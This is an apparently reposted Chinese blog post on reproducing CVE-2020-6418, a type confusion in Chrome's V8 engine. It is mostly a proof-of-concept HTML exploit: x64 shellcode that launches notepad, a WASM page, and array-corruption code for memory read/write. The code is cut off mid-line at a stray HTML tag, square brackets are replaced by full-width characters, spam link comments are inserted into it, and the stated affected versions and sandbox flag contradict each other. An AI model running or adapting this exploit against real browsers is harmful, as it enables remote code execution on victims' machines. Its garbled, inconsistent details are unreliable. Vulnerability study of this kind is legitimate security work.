心得经验总结:漏洞复现CVE

简介: 心得经验总结:漏洞复现CVE

V8是由Google开发的开源高性能javascript引擎(采用C++编写),而80.0.3987.122之前浏览器中的V8实现存在类型混淆漏洞,攻击者可以通过精心制作的HTML页面对受害者进行内存攻击,引发远程命令执行。有报道称,目前已出现利用CVE-2020-6418进行攻击的事件。

影响版本:Google:Chrome: <=89.0.4389.114

利用条件:开启免沙箱模式(默认情况下开沙箱运行)

参考连接:

复现过程:

先检验一下漏洞是否存在:

cmd执行命令:

"C:\Program

Files\Google\Chrome\Application\chrome.exe" -sand-box

(以不开启沙箱的模式运行chrome浏览器)

查看chrome版本:

(最新版本的仍然存在该漏洞)

打开测试用的POC:

成功执行命令,打开了记事本,漏洞存在

POC:

Test.html:

function gc() {

for (var i = 0; i < 0x80000; ++i) {

var a = new ArrayBuffer();

}

}

let shellcode = 【0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51,

0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52,

0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,

0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED,

0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88,

0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,

0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48,

0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1,

0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,

0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49,

0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A,

0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,

0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00,

0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B,

0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,

0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,

0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70,

0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00】;

var wasmCode = new Uint8Array(【0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11】);

var wasmModule = new WebAssembly.Module(wasmCode);

var wasmInstance = new WebAssembly.Instance(wasmModule);

var main = wasmInstance.exports.main;

var bf = new ArrayBuffer(8);

var bfView = new DataView(bf);

function fLow(f) {

bfView.setFloat64(0, f, true);

return (bfView.getUint32(0, true));

}

function fHi(f) {

bfView.setFloat64(0, f, true);

return (bfView.getUint32(4, true))

}

function i2f(low, hi) {

bfView.setUint32(0, low, true);

bfView.setUint32(4, hi, true);

return bfView.getFloat64(0, true);

}

function f2big(f) {

bfView.setFloat64(0, f, true);

return bfView.getBigUint64(0, true);

}//代码效果参考:http://www.ezhiqi.com/bx/art_1861.html

function big2f(b) {

bfView.setBigUint64(0, b, true);

return bfView.getFloat64(0, true);

}

class LeakArrayBuffer extends ArrayBuffer {

constructor(size) {

super(size);

this.slot = 0xb33f;

}

}

function foo(a) {

let x = -1;

if (a) x = 0xFFFFFFFF;

var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));

arr.shift();

let local_arr = Array(2);

local_arr【0】 = 5.1;//4014666666666666

let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8

arr【0】 = 0x1122;

return 【arr, local_arr, buff】;

}

for (var i = 0; i < 0x10000; ++i)

foo(false);

gc(); gc();

【corrput_arr, rwarr, corrupt_buff】 = foo(true);

corrput_arr【12】 = 0x22444;

delete corrput_arr;

function setbackingStore(hi, low) {

rwarr【4】 = i2f(fLow(rwarr【4】), hi);

rwarr【5】 = i2f(low, fHi(rwarr【5】));

}

function leakObjLow(o) {

corrupt_buff.slot = o;

return (fLow(rwarr【9】) - 1);

}//代码效果参考:http://www.ezhiqi.com/zx/art_3696.html

let corrupt_view = new DataView(corrupt_buff);

let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);

let idx0Addr = corrupt_buffer_ptr_low - 0x10<span style="color:

相关文章
|
3月前
|
SQL 安全 JavaScript
0x00.基础漏洞篇
0x00.基础漏洞篇
47 3
|
3月前
|
应用服务中间件 PHP nginx
CVE-2019-11043 复现
CVE-2019-11043 复现
75 5
|
3月前
|
安全 网络安全 Apache
CVE-2021-41773 复现
CVE-2021-41773 复现
209 1
|
安全 测试技术
漏洞复现--CVE-2020-0796getshell
漏洞复现--CVE-2020-0796getshell
漏洞复现--CVE-2020-0796getshell
|
资源调度 安全 Ubuntu
CVE-2021-3560漏洞复现及原理分析
CVE-2021-3560漏洞复现及原理分析
271 0
|
安全 Java 应用服务中间件
CVE-2023-21839漏洞本地简单复现
CVE-2023-21839漏洞本地简单复现
1066 0
|
安全 jenkins Java
CVE-2017-1000353 Jenkins漏洞复现系列(一)
Jenkins未授权远程代码执行漏洞, 允许攻击者将序列化的Java SignedObject对象传输给Jenkins CLI处理,反序列化ObjectInputStream作为Command对象,这将绕过基于黑名单的保护机制, 导致代码执行
804 0
|
缓存 安全 网络安全
心脏滴血漏洞复现(CVE-2014-0160)
心脏滴血漏洞复现(CVE-2014-0160)
342 0
|
安全 Java fastjson
Log4J 漏洞复现+漏洞靶场
Log4J 漏洞复现+漏洞靶场
|
SQL 安全 前端开发
CVE-2021-35042Django SQL注入漏洞复现
CVE-2021-35042Django SQL注入漏洞复现
200 0
CVE-2021-35042Django SQL注入漏洞复现